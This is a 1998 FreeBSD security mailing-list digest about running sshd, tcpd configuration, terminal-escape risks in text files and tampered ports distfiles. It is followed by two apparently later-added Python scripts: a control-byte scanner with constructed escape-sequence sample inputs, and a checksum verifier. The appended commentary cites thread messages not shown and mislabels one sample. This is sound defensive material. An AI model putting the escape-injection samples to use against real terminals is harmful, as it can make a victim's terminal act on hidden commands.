X-MIME-Autoconverted: from quoted-printable to 8bit by hub.freebsd.org id SAA02495
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Roger Marquis writes:
> The recommended sshd startup method used to be /etc/rc*(/*), probably
> for historical reasons. It may still be a good idea on slow CPUs,
> where it can take a while to generate a session key, or where
> inetd.conf isn't running, however, in my experience, sshd is much more
> reliably run from inetd.

"Much more reliable"? What's more reliable than 100%? Have you ever experienced any problems running sshd from /usr/local/etc/rc.d/? I haven't, and *all* boxes I control rely entirely on ssh for remote access, and have inetd disabled.

DES
--
Dag-Erling Smørgrav - dag-erli@ifi.uio.no

From owner-freebsd-security Sat Sep 12 18:19:50 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA03868 for freebsd-security-outgoing; Sat, 12 Sep 1998 18:19:50 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from taku.cchem.berkeley.edu (taku.cchem.berkeley.edu [128.32.220.208]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA03862 for ; Sat, 12 Sep 1998 18:19:47 -0700 (PDT) (envelope-from msinatra@uclink4.berkeley.edu)
Received: from deuterium.cchem.berkeley.edu (iridium.cchem.berkeley.edu [128.32.246.5]) by taku.cchem.berkeley.edu (8.9.1/8.9.1) with SMTP id SAA28453; Sat, 12 Sep 1998 18:19:30 -0700 (PDT)
Date: Sat, 12 Sep 1998 18:19:26 -0700 (PDT)
From: Michael Sinatra
X-Sender: msinatra@iridium.cchem.berkeley.edu
To: Roger Marquis
cc: freebsd-security@FreeBSD.ORG
Subject: Re: sshd
In-Reply-To:
Message-ID:
Distribution: ucb
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 11 Sep 1998, Roger Marquis wrote:

> The 2.2.6 man pages incorrectly identify /etc as the location of
> hosts.{allow,deny}. FWIW, /etc is the default location on every
> *other* Unix operating system.

It goes without saying that the type of Unix system has nothing to do with it--you can change the default location when you compile tcpd by changing HOSTS_ALLOW and HOSTS_DENY.

> When I first ran into this bug (back
> around 1.0.5) we had to `strings tcpd` to find where the access files
> were expected to be. This is one of the many FreeBSD ports that (IMHO)
> offer no advantages over the original package.

Is it supposed to offer any advantages other than being able to cd into the ports directory and simply type 'make' and have the system fetch the distribution and do everything for you, *and* be reasonably well-assured that the beast is going to compile? That is a pretty huge advantage for an overworked sysadmin like myself. I gave a talk a few weeks ago to UCB sysadmins on all of the different unixish options on intel hardware, and I demonstrated how /usr/ports works in FreeBSD. Everyone thought it was really cool, and needless to say, the freebie 2.2.6 cds that I had went like hotcakes.

> The recommended sshd startup method used to be /etc/rc*(/*), probably
> for historical reasons. It may still be a good idea on slow CPUs,
> where it can take a while to generate a session key, or where
> inetd.conf isn't running, however, in my experience, sshd is much more
> reliably run from inetd.

Hmmm. I have never had any problems running it standalone. I have noticed that the connections are slow to make during key regeneration on slow machines, but no "unreliability."

Michael Sinatra
Unix Guy
College of Chemistry
UC Berkeley

From owner-freebsd-security Sat Sep 12 19:53:13 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA11073 for freebsd-security-outgoing; Sat, 12 Sep 1998 19:53:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from RWSystems.net (Commie.RWSystems.net [204.251.23.221]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA11067 for ; Sat, 12 Sep 1998 19:53:12 -0700 (PDT) (envelope-from jwyatt@rwsystr.RWSystems.net)
Received: from rwsystr.RWSystems.net([204.251.23.1]) (1524 bytes) by RWSystems.net via sendmail with P:smtp/R:inet_hosts/T:smtp (sender: ) id for ; Sat, 12 Sep 1998 21:30:52 -0500 (CDT) (Smail-3.2.0.101 1997-Dec-17 #1 built 1998-Jul-31)
Date: Sat, 12 Sep 1998 21:29:49 -0500 (CDT)
From: James Wyatt
To: security@FreeBSD.ORG
Subject: Re: cat exploit
In-Reply-To: <19980911124430.A15005@drwho.xnet.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 11 Sep 1998, Michael Maxwell wrote:

> On Thu, Sep 10, 1998 at 10:57:59AM -0700, patl@phoenix.volant.org wrote:
> > No, I usually 'less', 'more', or even 'emacs' it. For two reasons.
> > 1) INSTALL is usually too large to fit in a single terminal window;
> > sometimes too large to fit in the default scrollbuffer. 2) It
> > might contain characters that would make my terminal window do
> > something I'd rather it didn't...
> And another solution that has thus far been forgotten: file(1). I use this
> routinely, on systems that have it, before I "cat" or "more" a file...

'file' only looks at enough of the file to characterize it and print something for the user. It catches binaries, but not someone embedding a control char in an interactive session (chat, motd 8{), old finger, such) or somewhere down in a 'text' file. Having Who-R-You (Ctl-E) support is *very* handy, could we just make it static? Make it return 'xterm' and nothing else and it might be safe.
James Wyatt (jwyatt@rwsystems.net)

From owner-freebsd-security Sat Sep 12 20:00:20 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA11696 for freebsd-security-outgoing; Sat, 12 Sep 1998 20:00:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from roble.com (roble.com [207.5.40.50]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA11691 for ; Sat, 12 Sep 1998 20:00:18 -0700 (PDT) (envelope-from sendmail@roble.com)
Received: from localhost (localhost [127.0.0.1]) by roble.com (Roble) with SMTP id TAA21632 for ; Sat, 12 Sep 1998 19:59:58 -0700 (PDT)
Date: Sat, 12 Sep 1998 19:59:58 -0700 (PDT)
From: Roger Marquis
To: freebsd-security@FreeBSD.ORG
Subject: Re: sshd
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by hub.freebsd.org id UAA11692
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

If you're running inetd then it doesn't seem consistent to start daemons that don't need to run all the time from startup scripts. Inetd was designed to conserve memory. If you have it why not use it? /etc/inetd.conf is also a common place to implement access control (via tcp_wrappers).

Other than that I've frequently run into situations where keepalives had to be turned off. In those cases ssh sessions invariably die and their daemons have to be killed-off by hand (kill ). As it is difficult to tell the original daemon from the child daemons it's also easy to accidentally kill the parent. If ssh is the only access you're locked-out. Easier and more consistent to use inetd where it's available, IMHO and YMMV.

Roger Marquis
Roble Systems Consulting
http://www.roble.com/

On 13 Sep 1998, Dag-Erling Coïdan Smørgrav wrote:
> "Much more reliable"? What's more reliable than 100%? Have you ever
> experienced any problems running sshd from /usr/local/etc/rc.d/? I
> haven't, and *all* boxes I control rely entirely on ssh for remote
> access, and have inetd disabled.

From owner-freebsd-security Sat Sep 12 20:21:36 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA14011 for freebsd-security-outgoing; Sat, 12 Sep 1998 20:21:36 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from roble.com (roble.com [207.5.40.50]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA14005 for ; Sat, 12 Sep 1998 20:21:33 -0700 (PDT) (envelope-from sendmail@roble.com)
Received: from localhost (localhost [127.0.0.1]) by roble.com (Roble) with SMTP id UAA21863 for ; Sat, 12 Sep 1998 20:21:19 -0700 (PDT)
Date: Sat, 12 Sep 1998 20:21:19 -0700 (PDT)
From: Roger Marquis
To: freebsd-security@FreeBSD.ORG
Subject: Re: sshd
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 12 Sep 1998, Michael Sinatra wrote:

> Is it supposed to offer any advantages other than being able to cd into
> the ports directory and simply type 'make' and have the system fetch the
> distribution and do everything for you, *and* be reasonably well-assured
> that the beast is going to compile? That is a pretty huge advantage for
> an overworked sysadmin like myself.

True, and ports are probably the aspect of FreeBSD I appreciate most, however, the more ports I've used the more careful I've become about them. The basic downside to ports is their lack of standardization and QA. For one thing 'make -n install' typically doesn't yield readable information unless you first 'cd work/*'. Secondly, while port A installs under /usr/, port B installs to /usr/local/etc and port C in /usr/libexec, ... You can never be sure what is going where and it's a rare port that can be uninstalled with 'make uninstall'.

There's also no way to validate all of the source hosts listed in the Makefile. We've downloaded hacked versions of a port and had to redownload and recompile when the hack became obvious (through corrupt syslogs and attempts to grab /pwd.db).

Bottom line, ports are cool, no question, but not without risk.
Roger Marquis
Roble Systems Consulting
http://www.roble.com/

From owner-freebsd-security Sat Sep 12 20:47:56 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA16517 for freebsd-security-outgoing; Sat, 12 Sep 1998 20:47:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from redfish.go2net.com (redfish.go2net.com [207.178.55.5]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id UAA16502 for ; Sat, 12 Sep 1998 20:47:51 -0700 (PDT) (envelope-from marcs@go2net.com)
Received: from marcs by redfish.go2net.com with smtp (Exim 1.82 #2) id 0zI372-000572-00; Sat, 12 Sep 1998 20:46:08 -0700
Date: Sat, 12 Sep 1998 20:46:08 -0700 (PDT)
From: Marc Slemko
X-Sender: marcs@redfish
To: Roger Marquis
cc: freebsd-security@FreeBSD.ORG
Subject: Re: sshd
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, 12 Sep 1998, Roger Marquis wrote:

> Secondly, while port A installs under /usr/, port B installs to
> /usr/local/etc and port C in /usr/libexec, ... You can never be sure

Erm... any port that does so (with rare exceptions) is broken and should be fixed.

> There's also no way to validate all of the source hosts listed in the
> Makefile. We've downloaded hacked versions of a port and had to
> redownload and recompile when the hack became obvious (through corrupt
> syslogs and attempts to grab /pwd.db).

I don't understand what you mean. What do you want to validate about the source host? That they exist? There is already a md5 in the port of the distribution tarball...

From owner-freebsd-security Sat Sep 12 21:36:28 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA19485 for freebsd-security-outgoing; Sat, 12 Sep 1998 21:36:28 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from fallout.campusview.indiana.edu (fallout.campusview.indiana.edu [149.159.1.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA19469; Sat, 12 Sep 1998 21:36:26 -0700 (PDT) (envelope-from jfieber@indiana.edu)
Received: from localhost (jfieber@localhost) by fallout.campusview.indiana.edu (8.8.8/8.8.7) with SMTP id XAA15989; Sat, 12 Sep 1998 23:35:54 -0500 (EST)
Date: Sat, 12 Sep 1998 23:35:54 -0500 (EST)
From: John Fieber
To: Roger Marquis
cc: freebsd-security@FreeBSD.ORG, ports@FreeBSD.ORG
Subject: Re: sshd
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

[topic drift from security to ports; CC: added]

On Sat, 12 Sep 1998, Roger Marquis wrote:

> For one thing 'make -n install' typically doesn't yield readable
> information unless you first 'cd work/*'.

'more pkg/PLIST' is generally more efficient......if the PLIST is accurate.

> Secondly, while port A installs under /usr/, port B
> installs to /usr/local/etc and port C in /usr/libexec, ...
> You can never be sure what is going where and it's a rare
> port that can be uninstalled with 'make uninstall'.

I have 103 ports installed on my machine now. Not one of them *ever* installed anything in /usr/---I would have noticed right away because my /usr file system is read only. If you find a port that installs something (a) somewhere off limits or (b) somewhere okay but in a bone-headed layout, by all means submit a bug report to the maintainer.

Is it better to make ports conform to a strict BSD style file layout or stick with the style native to the software being ported? If I only managed FreeBSD systems, I'd opt for strict BSD but since I manage a number of other platforms I also value cross-platform consistency which may sometimes mean using an un-BSD-like layout. Short of providing multiple layout options in the port, you can't satisfy everyone.

A majority of the ports I've installed uninstall pretty cleanly. The most common offense is leaving empty directories around. Again, this is all a volunteer project. If you install a port and spot a problem, submit a patch to the maintainer listed in the makefile!

A more frustrating problem for me are ports that are not ${PREFIX} != /usr/local compatible which makes it a hassle to install multiple versions of a port or separate ports that have common files. Also, I occasionally go through phases of liking the SysV way of installing things in /opt/, /etc/opt/ and /var/opt/ which a simple 'make PREFIX=/opt/' doesn't really accomplish.

> There's also no way to validate all of the source hosts listed in the
> Makefile. We've downloaded hacked versions of a port and had to
> redownload and recompile when the hack became obvious (through corrupt
> syslogs and attempts to grab /pwd.db).

Um, that is what the checksums on the distfiles are for. Not a 100% guarantee of not being hacked, but a reasonable defense if you trust the person who made the port. Again, I hope you reported these incidents to the maintainer of the port.

-john
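The "cat exploit" thread earlier in this digest (Andrew McNaughton's text file with binary tacked on the end, Mark Valentine's `#! ^E` file, James Wyatt's point that file(1) only reads enough of a file to classify it) calls for a check that looks at every byte. The following is an added example, not code from the list or from FreeBSD: a Python scanner that reports every C0/C1 control character and every complete CSI/OSC escape sequence in a file, with byte offsets, so the file can be checked before it is sent to a terminal. The sample inputs are constructed and merely shaped like the cases discussed; the script name in the usage comment is a placeholder.

```python
"""Whole-file scan for terminal control bytes before cat(1)/more(1) a file.

Added example for the "cat exploit" thread; not code from the list or from
FreeBSD.  file(1) classifies from the head of a file only; this walks every byte.
"""
import re
import sys
from typing import Dict, List, Tuple

# C0 controls that ordinary text legitimately contains: TAB, LF, CR.
_BENIGN = {0x09, 0x0A, 0x0D}

# ECMA-48 escape sequences: CSI (ESC [ params final) and OSC (ESC ] text BEL | ESC \).
_CSI = re.compile(rb"\x1b\[[0-?]*[ -/]*[@-~]")
_OSC = re.compile(rb"\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)")

_NAMES: Dict[int, str] = {
    0x00: "NUL",
    0x05: "ENQ (terminal answerback query)",
    0x07: "BEL",
    0x1B: "ESC (starts an escape sequence)",
    0x7F: "DEL",
    0x9B: "CSI (8-bit control sequence introducer)",
}

# Constructed sample inputs, shaped like the cases discussed on the list.
PHILIPPE_STYLE = b"#! \x05\n"                         # shebang followed by ENQ (Ctrl-E)
TEXT_THEN_BINARY = (b"All the INSTALL text you expect.\n" * 2000
                    + b"\x00\x1b[2J\x1b]0;title\x07")  # clean text, junk at the very end
LATIN1_CSI = b"text\x9bJ"                              # 8-bit CSI in a non-UTF-8 file
PLAIN = "Just text, with a caf\u00e9 and a tab\there.\n".encode("utf-8")


def _label(code: int) -> str:
    if code in _NAMES:
        return _NAMES[code]
    return "C1 control" if 0x80 <= code <= 0x9F else "C0 control"


def scan_for_controls(data: bytes) -> List[Tuple[int, int, str]]:
    """Return (byte offset, code, label) for every control character in data.

    The whole buffer is scanned, so binary tacked onto the end of an
    otherwise clean text file is still reported.
    """
    findings = [(off, b, _label(b)) for off, b in enumerate(data)
                if (b < 0x20 and b not in _BENIGN) or b == 0x7F]
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        # Not UTF-8: raw bytes 0x80-0x9F are 8-bit C1 controls (or plain binary).
        findings += [(off, b, _label(b)) for off, b in enumerate(data)
                     if 0x80 <= b <= 0x9F]
    else:
        # Valid UTF-8: C1 controls are the code points U+0080-U+009F, so
        # track the byte offset while walking characters.
        off = 0
        for ch in text:
            cp = ord(ch)
            if 0x80 <= cp <= 0x9F:
                findings.append((off, cp, _label(cp)))
            off += len(ch.encode("utf-8"))
    return sorted(findings)


def extract_escape_sequences(data: bytes) -> List[Tuple[int, bytes]]:
    """Return (offset, raw sequence) for each complete CSI/OSC sequence found."""
    hits = [(m.start(), m.group(0)) for m in _CSI.finditer(data)]
    hits += [(m.start(), m.group(0)) for m in _OSC.finditer(data)]
    return sorted(hits)


def is_safe_to_display(data: bytes) -> bool:
    """True when the file contains nothing a terminal could act on."""
    return not scan_for_controls(data)


if __name__ == "__main__":
    # Usage: python catcheck.py FILE    (placeholder name; exit status 1 if anything was found)
    with open(sys.argv[1], "rb") as fh:
        blob = fh.read()
    for off, code, label in scan_for_controls(blob):
        print(f"offset {off}: 0x{code:02x} {label}")
    for off, seq in extract_escape_sequences(blob):
        print(f"offset {off}: escape sequence {seq!r}")
    sys.exit(0 if is_safe_to_display(blob) else 1)
```

Two design points: the scan decides between "UTF-8 text" and "bytes" before looking for C1 controls, because the byte values 0x80 to 0x9F are harmless continuation bytes inside valid UTF-8 but are real 8-bit controls in a Latin-1 or binary file; and the escape-sequence extractor only reports what the C0 scan has already flagged via ESC, it just shows the reader which sequence it was.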
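For the distfile checksum point in the last two messages (Marc Slemko's "md5 in the port of the distribution tarball", John Fieber's "that is what the checksums on the distfiles are for"), here is an added example that is not the ports framework's own code: a Python verifier that parses a distinfo-style record and checks a downloaded file against it before anything is unpacked or built. The record format is assumed (lines of the form `MD5 (file) = hex`, `SHA256 (file) = hex`, `SIZE (file) = n`); a record that carries a size but no digest is refused, since a size alone proves nothing. The file and the record are constructed inside demo(), including a one-byte tamper that keeps the size unchanged.

```python
"""Verify a downloaded distfile against a recorded checksum before building it.

Added example; not the FreeBSD ports framework's own code.  The distinfo
format below is an assumption modelled on "MD5 (file) = hash" style lines.
"""
import hashlib
import hmac
import os
import re
import tempfile
from typing import Dict, List

_DIGEST = re.compile(r"^(?P<algo>MD5|SHA256)\s+\((?P<name>[^)]+)\)\s*=\s*(?P<hex>[0-9a-fA-F]+)\s*$")
_SIZE = re.compile(r"^SIZE\s+\((?P<name>[^)]+)\)\s*=\s*(?P<size>\d+)\s*$")


def parse_distinfo(text: str) -> Dict[str, Dict[str, str]]:
    """Return {distfile name: {"md5"/"sha256"/"size": value}}; reject unknown lines."""
    records: Dict[str, Dict[str, str]] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _DIGEST.match(line)
        if m:
            records.setdefault(m["name"], {})[m["algo"].lower()] = m["hex"].lower()
            continue
        m = _SIZE.match(line)
        if m:
            records.setdefault(m["name"], {})["size"] = m["size"]
            continue
        raise ValueError(f"distinfo line {lineno}: unrecognised entry {raw!r}")
    return records


def file_digests(path: str) -> Dict[str, str]:
    """Stream the file once and return its md5, sha256 and size as strings."""
    md5, sha256, size = hashlib.md5(), hashlib.sha256(), 0
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            md5.update(chunk)
            sha256.update(chunk)
            size += len(chunk)
    return {"md5": md5.hexdigest(), "sha256": sha256.hexdigest(), "size": str(size)}


def verify_distfile(path: str, expected: Dict[str, str]) -> List[str]:
    """Return the list of mismatches; an empty list means every recorded value matched.

    A record without any digest is itself reported, so size-only records cannot pass.
    """
    problems: List[str] = []
    if not any(k in expected for k in ("md5", "sha256")):
        problems.append("no digest recorded; refusing to trust size alone")
    actual = file_digests(path)
    for key in ("sha256", "md5", "size"):
        if key in expected and not hmac.compare_digest(expected[key], actual[key]):
            problems.append(f"{key} mismatch: expected {expected[key]}, got {actual[key]}")
    return problems


def make_distinfo(path: str, name: str) -> str:
    """Produce a distinfo record for a file the maintainer has vetted."""
    d = file_digests(path)
    return f"MD5 ({name}) = {d['md5']}\nSHA256 ({name}) = {d['sha256']}\nSIZE ({name}) = {d['size']}\n"


def demo() -> Dict[str, List[str]]:
    """Constructed round trip: fake distfile, its record, a size-only record, a tampered file."""
    name = "example-1.0.tar.gz"          # placeholder name, not a real port
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, name)
        with open(path, "wb") as fh:
            fh.write(b"\x1f\x8b" + bytes(range(256)) * 64)   # gzip magic plus filler
        expected = parse_distinfo(make_distinfo(path, name))[name]
        clean = verify_distfile(path, expected)
        no_digest = verify_distfile(path, {"size": expected["size"]})
        with open(path, "r+b") as fh:
            fh.seek(1000)
            fh.write(b"\xff")             # flip one byte; the size stays the same
        tampered = verify_distfile(path, expected)
    return {"clean": clean, "no_digest": no_digest, "tampered": tampered}


if __name__ == "__main__":
    for label, result in demo().items():
        print(f"{label}: {'OK' if not result else '; '.join(result)}")
```

The comparison goes through hmac.compare_digest rather than `==` so that the check's timing does not depend on how many leading characters of a digest agree; the size check stays in because it is cheap and catches truncated downloads before any hashing is done, but it is never accepted on its own.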